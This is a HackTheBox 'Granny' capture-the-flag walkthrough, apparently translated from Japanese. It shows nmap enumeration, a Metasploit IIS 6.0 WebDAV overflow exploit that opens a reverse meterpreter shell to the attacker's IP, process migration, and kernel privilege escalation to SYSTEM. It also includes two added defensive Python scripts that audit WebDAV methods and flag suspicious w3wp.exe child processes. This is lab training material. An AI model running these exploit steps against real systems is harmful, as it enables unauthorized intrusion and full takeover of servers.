From HackTheBox
twitter:@ikk_hck
Enumeration
Anyway, nmap.
```
$ nmap -sC -sV -A -oA granny 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 03:19 PDT
```
Here are the results.
```
# Nmap 7.91 scan initiated Sat May 8 01:11:23 2021 as: nmap -sC -sV -A -oA granny 10.10.10.15
Nmap scan report for 10.10.10.15
Host is up (0.19s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Error
| http-webdav-scan: 
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
|_  Server Date: Sat, 08 May 2021 08:13:22 GMT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 8 01:11:48 2021 -- 1 IP address (1 host up) scanned in 25.44 seconds
```
You can see that Microsoft IIS httpd 6.0 is running on port 80, and that WebDAV is enabled with a long list of risky methods (PUT, DELETE, COPY, MOVE, PROPFIND and friends).
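From a defender's side, the same nmap output is an audit finding: the methods the server advertises and the ones it actually accepts should be compared against what the application needs. The following is an added example (not from the writeup) that parses the `http-webdav-scan` lines above, re-typed as a constant, and lists the methods to disable; the allow-list of "safe" methods is an assumption for a plain content-serving site.

```python
"""Audit HTTP/WebDAV methods reported by nmap's http-webdav-scan script.

Added example for this writeup. NMAP_OUTPUT is the scan output shown above,
re-typed as a constant. SAFE_METHODS is an assumption: what a static/ASP
content site normally needs; applications that really use WebDAV differ."""
import re

SAFE_METHODS = {"GET", "HEAD", "POST", "OPTIONS"}
WEBDAV_VERBS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK", "SEARCH"}
WRITE_VERBS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL"}

NMAP_OUTPUT = """\
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan:
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
"""


def parse_methods(text, label):
    """Return the set of methods listed after `label:` (one nmap script line)."""
    m = re.search(rf"{re.escape(label)}:\s*(.+)", text)
    if not m:
        return set()
    return {tok.strip(",") for tok in m.group(1).split() if tok.strip(",")}


def audit(text):
    """Summarise the finding.

    'Public Options' is what the OPTIONS response advertises; 'Allowed Methods'
    is what nmap confirmed the root URI accepts. Both matter: an advertised but
    rejected method (PUT here) still leaks configuration, and accepted write
    verbs are the real exposure."""
    public = parse_methods(text, "Public Options")
    allowed = parse_methods(text, "Allowed Methods")
    return {
        "webdav_enabled": bool(allowed & WEBDAV_VERBS),
        "disable_advertised": sorted(public - SAFE_METHODS),
        "disable_accepted": sorted(allowed - SAFE_METHODS),
        "write_methods_accepted": sorted(allowed & WRITE_VERBS),
    }
```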
I'll search for it in Metasploit.
```
$ msfconsole

       =[ metasploit v6.0.40-dev                          ]
+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params set LHOST eth0

msf6 > search iis 6.0

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/firewall/blackice_pam_icq            2004-03-18       great   No     ISS PAM.dll ICQ Parser Buffer Overflow
   1  auxiliary/dos/windows/http/ms10_065_ii6_asp_dos      2010-09-14       normal  No     Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service
   2  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow


Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl
```
Exploit
I found it, set the IP addresses and so on, and ran it.
```
msf6 > use 2
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86


msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhost 10.10.10.15
rhost => 10.10.10.15
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > check
[+] 10.10.10.15:80 - The target is vulnerable.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.15:1030) at 2021-05-10 03:24:21 -0700

meterpreter > 
```
The intrusion was successful.
PE
```
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
```
I try to check which user I'm running as, but I can't even do that.
Let's check the process.
```
meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 324   272   csrss.exe
 348   272   winlogon.exe
 396   348   services.exe
 408   348   lsass.exe
 596   396   svchost.exe
 680   396   svchost.exe
 736   396   svchost.exe
 784   396   svchost.exe
 800   396   svchost.exe
 936   396   spoolsv.exe
 964   396   msdtc.exe
 1084  396   cisvc.exe
 1124  396   svchost.exe
 1180  396   inetinfo.exe
 1216  396   svchost.exe
 1332  396   VGAuthService.exe
 1412  396   vmtoolsd.exe
 1464  396   svchost.exe
 1628  396   svchost.exe
 1732  396   dllhost.exe
 1816  396   alg.exe
 1832  596   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1900  396   dllhost.exe
 2120  396   vssvc.exe
 2176  1464  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2244  596   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 2308  2176  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 2488  596   wmiprvse.exe
```
Which process am I in?
```
meterpreter > getpid
Current pid: 2308
```
I see. I'll migrate into one of the processes running as "NT AUTHORITY\NETWORK SERVICE".
```
meterpreter > migrate 2244
[*] Migrating from 2308 to 2244...
[*] Migration completed successfully.
```
Checking the user again, you can see it is now "NT AUTHORITY\NETWORK SERVICE".
```
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
```
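The process list above is also what a defender would use to spot this foothold: the shell lives in rundll32.exe (PID 2308), whose parent is the IIS worker process w3wp.exe (PID 2176), a parent-child pair a content web server should never produce. The following is an added example (not from the writeup) that builds the parent-child relation from a meterpreter-style `ps` listing, re-typed here as a constructed excerpt, and flags unexpected children of w3wp.exe; the allow-list and the list of commonly abused binaries are assumptions to tune per environment.

```python
"""Flag suspicious children of the IIS worker process in a process listing.

Added example for this writeup (not from the original post). PS_LISTING is a
constructed excerpt of the meterpreter `ps` output above, in the same column
order: PID PPID Name [Arch Session User Path]. EXPECTED_W3WP_CHILDREN and
ABUSED_HOSTS are assumptions; adjust them to the application being served."""
import re

PS_LISTING = """\
 PID   PPID  Name          Arch  Session  User                          Path
 ---   ----  ----          ----  -------  ----                          ----
 1464  396   svchost.exe
 1832  596   wmiprvse.exe  x86   0        NT AUTHORITY\\NETWORK SERVICE  C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe
 2176  1464  w3wp.exe      x86   0        NT AUTHORITY\\NETWORK SERVICE  c:\\windows\\system32\\inetsrv\\w3wp.exe
 2244  596   davcdata.exe  x86   0        NT AUTHORITY\\NETWORK SERVICE  C:\\WINDOWS\\system32\\inetsrv\\davcdata.exe
 2308  2176  rundll32.exe  x86   0                                      C:\\WINDOWS\\system32\\rundll32.exe
 2488  596   wmiprvse.exe
"""

# Children an IIS 6 worker may legitimately spawn. On a static content
# server the honest answer is usually "none" (assumption).
EXPECTED_W3WP_CHILDREN = set()

# Binaries that commonly host post-exploitation code when a web server
# spawns them; any other unexpected child is still reported, at lower severity.
ABUSED_HOSTS = {"rundll32.exe", "cmd.exe", "powershell.exe"}

ROW = re.compile(r"^\s*(\d+)\s+(\d+)\s+(\S+)")


def parse_processes(text):
    """Return {pid: (ppid, name)}; header/separator lines do not match ROW."""
    procs = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            procs[int(m.group(1))] = (int(m.group(2)), m.group(3).lower())
    return procs


def suspicious_children(procs, parent_name="w3wp.exe"):
    """Return [(pid, name, ppid, severity)] for children of every process named
    `parent_name` that are not in EXPECTED_W3WP_CHILDREN."""
    parents = {pid for pid, (_, name) in procs.items() if name == parent_name}
    hits = []
    for pid, (ppid, name) in sorted(procs.items()):
        if ppid in parents and name not in EXPECTED_W3WP_CHILDREN:
            hits.append((pid, name, ppid, "high" if name in ABUSED_HOSTS else "medium"))
    return hits
```

Note that the migration into davcdata.exe a few lines above leaves no such parent-child trace, which is why process-tree alerts need to fire on the initial spawn rather than on a later snapshot.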
Background the session and return to the msf console to look for an exploit module that can be used for PE.
```
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 37 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_058_track_popup_menu
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_058_track_popup_menu) > show options

Module options (exploit/windows/local/ms14_058_track_popup_menu):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf6 exploit(windows/local/ms14_058_track_popup_menu) > set session 1
session => 1
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Launching notepad to host the exploit...
[+] Process 1824 launched.
[*] Reflectively injecting the exploit DLL into 1824...
[*] Injecting exploit into 1824...
[*] Exploit injected. Injecting payload into 1824...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
```
I tried "ms14_058_track_popup_menu", but it didn't work.
Next, try "ms14_070_tcpip_ioctl".
```
msf6 exploit(windows/local/ms14_058_track_popup_menu) > use exploit/windows/local/ms14_070_tcpip_ioctl
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > show options

Module options (exploit/windows/local/ms14_070_tcpip_ioctl):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Server 2003 SP2


msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.5:4444 -> 10.10.10.15:1031) at 2021-05-10 03:32:40 -0700

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
It seems to have succeeded, and checking the user again shows "NT AUTHORITY\SYSTEM".
Then browse the filesystem as below to find the flag.
```
meterpreter > cd /
meterpreter > ls
Listing: C:\
============

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2017-04-12 07:27:12 -0700  ADFS
100777/rwxrwxrwx  0       fil   2017-04-12 07:04:44 -0700  AUTOEXEC.BAT
100666/rw-rw-rw-  0       fil   2017-04-12 07:04:44 -0700  CONFIG.SYS
40777/rwxrwxrwx   0       dir   2017-04-12 06:42:38 -0700  Documents and Settings
40777/rwxrwxrwx   0       dir   2017-04-12 07:17:24 -0700  FPSE_search
100444/r--r--r--  0       fil   2017-04-12 07:04:44 -0700  IO.SYS
40777/rwxrwxrwx   0       dir   2017-04-12 07:16:33 -0700  Inetpub
100444/r--r--r--  0       fil   2017-04-12 07:04:44 -0700  MSDOS.SYS
100555/r-xr-xr-x  47772   fil   2007-02-18 04:00:00 -0800  NTDETECT.COM
40555/r-xr-xr-x   0       dir   2017-04-12 06:43:02 -0700  Program Files
40777/rwxrwxrwx   0       dir   2017-04-12 12:02:02 -0700  RECYCLER
40777/rwxrwxrwx   0       dir   2017-04-12 06:42:38 -0700  System Volume Information
40777/rwxrwxrwx   0       dir   2017-04-12 06:41:07 -0700  WINDOWS
100666/rw-rw-rw-  208     fil   2017-04-12 06:42:08 -0700  boot.ini
100444/r--r--r--  297072  fil   2007-02-18 04:00:00 -0800  ntldr
0000/---------    0       fif   1969-12-31 16:00:00 -0800  pagefile.sys
40777/rwxrwxrwx   0       dir   2017-04-12 07:05:06 -0700  wmpub

meterpreter > cd Documents\ and\ Settings
meterpreter > ls
Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-04-12 07:12:15 -0700  Administrator
40777/rwxrwxrwx  0     dir   2017-04-12 06:42:38 -0700  All Users
40777/rwxrwxrwx  0     dir   2017-04-12 06:42:38 -0700  Default User
40777/rwxrwxrwx  0     dir   2017-04-12 12:19:46 -0700  Lakis
40777/rwxrwxrwx  0     dir   2017-04-12 07:08:32 -0700  LocalService
40777/rwxrwxrwx  0     dir   2017-04-12 07:08:31 -0700  NetworkService

meterpreter > cd Administrator
meterpreter > ls
Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Application Data
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Cookies
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Desktop
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Favorites
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Local Settings
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  My Documents
100666/rw-rw-rw-  786432  fil   2017-04-12 07:12:15 -0700  NTUSER.DAT
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  NetHood
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  PrintHood
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Recent
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  SendTo
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Start Menu
100666/rw-rw-rw-  0       fil   2017-04-12 07:12:15 -0700  Sti_Trace.log
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Templates
40777/rwxrwxrwx   0       dir   2017-04-12 11:48:10 -0700  UserData
100666/rw-rw-rw-  1024    fil   2017-04-12 07:12:15 -0700  ntuser.dat.LOG
100666/rw-rw-rw-  178     fil   2017-04-12 07:12:15 -0700  ntuser.ini

meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-04-12 07:28:50 -0700  root.txt
```
Incidentally
If you try the privilege escalation without first migrating out of the original process, you get the following.
```
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
```
Good night.